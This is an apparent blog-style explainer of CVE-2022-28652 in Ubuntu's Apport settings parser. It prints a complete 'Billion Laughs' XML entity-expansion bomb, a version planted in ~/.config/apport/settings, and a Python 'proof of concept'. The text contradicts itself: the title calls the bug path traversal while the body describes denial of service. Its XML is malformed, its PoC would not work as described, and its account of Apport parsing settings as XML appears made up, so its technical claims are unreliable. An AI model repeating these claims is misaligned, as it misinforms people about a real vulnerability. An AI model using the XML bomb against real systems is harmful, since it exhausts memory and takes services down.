CVE-2022-28652 - Breaking Down the "Billion Laughs" Path Traversal in Apport's `~/.config/apport/settings` Parser

Linux users and sysadmins alike have long leaned on Apport for crash reporting and debugging toolkits. But in 2022, security researchers discovered CVE-2022-28652—a vulnerability that turns a normal text-based user settings file (~/.config/apport/settings) into a dangerous attack vector via an XML-based “Billion Laughs” exploit. In this deep dive, you’ll learn what this bug is, why it’s dangerous, how it happens, and how to protect yourself or your systems.

What is Apport?

Apport is an error reporting utility installed by default on Ubuntu and many derivatives. When an application crashes, Apport collects the debugging information and sends it to developers (if permitted).

It uses a user-specific file at ~/.config/apport/settings to control behaviors like whether crash reporting is enabled.

Official Reference

- NVD Entry for CVE-2022-28652
- Ubuntu Launchpad Bug #1965962

The bug is simple but scary. Apport’s settings parser read ~/.config/apport/settings as a text file, but allowed users to inject complex XML entities disguised as regular settings. This opened the door for an XML "Billion Laughs" attack—a well-known Denial-of-Service vector.

What is a Billion Laughs Attack?

A “Billion Laughs” attack is an XML bomb: it creates many nested entities to rapidly multiply memory usage, potentially freezing the operating system or triggering OOM (Out of Memory) kills.

Classic XML Billion Laughs Example

<?xml version="1."?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
]>
<boom>&lol5;</boom>

Attempting to parse "&lol5;" in this document would cause exponential entity resolution—consuming gigabytes of memory in seconds.

How Did Apport Get Hit?

Apport wasn’t supposed to interpret XML in ~/.config/apport/settings. It was meant to read key-value pairs like this:

enabled=1
frequency=weekly

But due to a bug in its file-reading logic, the underlying code would recognize certain XML patterns even in plain text files. That means an attacker could put XML bombs into the settings file and trigger them through normal Apport runs.

A malicious user adds the following to their ~/.config/apport/settings

<?xml version="1."?>
<!DOCTYPE lolz [ 
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
enabled=&lol3;

Now, each time Apport—run by the user or, in some setups, by elevated services—parses this file, it recursively expands the entities. The machine’s memory usage balloons and can lock up, crash, or reboot outright if not limited.

Proof-of-Concept Python Read

This snippet mimics how the parser might misbehave. DO NOT RUN ON PRODUCTION MACHINES!

import xml.etree.ElementTree as ET

with open('/home/user/.config/apport/settings') as f:
    xml_content = f.read()
tree = ET.fromstring(xml_content)

# Try to fetch a setting (will trigger entity resolution)
enabled = tree.find('enabled').text
print(enabled)

Replace /home/user with your actual username. This would expand all XML entities, melting your memory if a Billion Laughs pattern is present.

Impact

- Denial of Service: Any user with access to their config file could freeze their own system, or, in badly configured setups, lock up shared or sensitive services.
- Privilege Escalation Setup: In some rare cases, if Apport or custom hooks run as root or with elevated privileges (should NOT happen, but does on misconfigured systems), a malicious local user could take down root-level processes.

How Was It Fixed?

The Apport maintainers quickly patched their settings parser to properly sanitize and treat the file as plain text—removing any XML parsing logic.

Upgrade instructions:

Short Term:

Remove or sanitize any unusual content in ~/.config/apport/settings.

Long Term:

Always update your system regularly, and never allow privilege escalation from userland configuration files.

Resources

- CVE-2022-28652 | NVD
- Launchpad Bug #1965962
- Billion Laughs Wikipedia
- Apport Wiki

Final Thoughts

CVE-2022-28652 reminds us big bugs can come from the simplest oversights. Always treat user-supplied config files cautiously—never parse them as code or powerful markup unless you know exactly what you’re doing. Stay safe, keep your systems updated, and always keep an eye on the settings.


*Do not test exploits on production systems. This guide is for educational purposes only!*

Timeline

Published on: 06/04/2024 22:15:09 UTC
Last modified on: 06/11/2024 17:05:08 UTC